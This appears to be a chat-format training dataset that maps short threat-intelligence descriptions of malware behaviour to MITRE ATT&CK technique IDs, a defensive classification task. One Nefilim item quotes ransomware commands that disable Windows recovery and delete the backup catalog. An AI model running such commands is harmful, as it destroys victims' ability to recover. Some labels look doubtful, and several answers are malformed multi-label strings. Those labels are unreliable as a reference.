- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi uses AutoIt and VBS scripts throughout its execution process."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses 443 for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker has performed DLL hijacking before execution."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates with its C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN). Discord’s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An already public UAC bypass method is included in the binary. It doesn’t matter if the method will work or not since the process will exit. This is one more indication that the tool is still in development and there are plans to expand its capabilities"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6"
- },
- {
- "role": "assistant",
- "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY downloads and executes additional PowerShell code and Windows binaries."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout has used folder icons for malicious files to lure victims into opening them."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can use the ARP table to find remote hosts to scan."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use \"net localgroup\" to list local groups on a system."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unknown Logger is capable of recording keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT18 actors leverage legitimate credentials to log into external remote services."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current user:"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both masscan and pnscan have been used before by TeamTNT actors. However, the addition of zgrab, a GoLang network scanner, marks the first time that a GoLang tool has been witnessed incorporated into TeamTNT’s TTPs. There was also an update to the masscan network scanner operation to include searching for TCP port 5555. This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations. However, there is little evidence to support TeamTNT targeting Android devices"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can use the API `DnsQuery_A` for DNS resolution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has used TCP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can enumerate the permissions associated with Windows groups."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SOUNDBITE is capable of modifying the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples have a module to use pass the ticket with Kerberos for authentication."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Password stealer and NTLM stealer modules in harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication. has also executed for further victim penetration."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware attempts to determine the installed version of .NET by querying the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro’s developer named it “Google Plugin” version 1.5.0. Visually, it adds a square button to the browser window instead of the “cookie” button on the original plugin"
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems."
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat is capable of providing shell functionality to the attacker to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has exfiltrated collected host information to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to poison name services to gather hashes and credentials from systems within a local network."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete employed some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant has used rundll32 for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can identify the hard disk volume serial number on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon can use HTTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can obtain a list of directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DownPaper collects the victim host name and serial number, and then sends the information to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download a file from the C2 server to the victim mobile device's SD card."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 has a number of modules that leverage pass the hash for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can write encrypted JSON configuration files to the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub has used XOR encrypted payloads in WebSocket client to server messages."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday)."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has used wmic.exe for local discovery information."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used batch scripts to enumerate users in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 has compromised domains to use for C2."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has obfuscated code using Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8’s Command and Control (C&C) servers. This download was blocked by Bitdefender – below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1105 - Ingress Tool Transfer', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can gather process information."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton zips up files before exfiltrating them."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used SMB to copy files to and from target systems."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has obtained and used tools such as gsecdump."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can use the \"ITaskService\", \"ITaskDefinition\" and \"ITaskSettings\" COM interfaces to schedule a task."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper is capable of enumerating the running processes on the system using \"pslist\"."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nefilim also uses bcdedit.exe twice to disable automatic Windows recovery features by modifying boot configuration data. bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures Moreover, the Nefilim ransomware uses wbadmin to delete the backup catalog: wbadmin delete catalog -quiet"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use MSHTA to serve additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has a command built in to use a raw TCP socket."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY uploads data in 2048-byte chunks."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used process hollowing in iexplore.exe to load the implant."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains a list of running processes on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FormBook authors did some rewrites on the original exploit, taking as their initial codebase the one that we and Microsoft observed as deploying Cobalt Strike beacons. The exploited vulnerability is CVE-2021-40444. However, since the vulnerability itself has been analyzed already, here we focus on describing some of the unique changes made by FormBook."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can downloaded payloads from C2 to the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
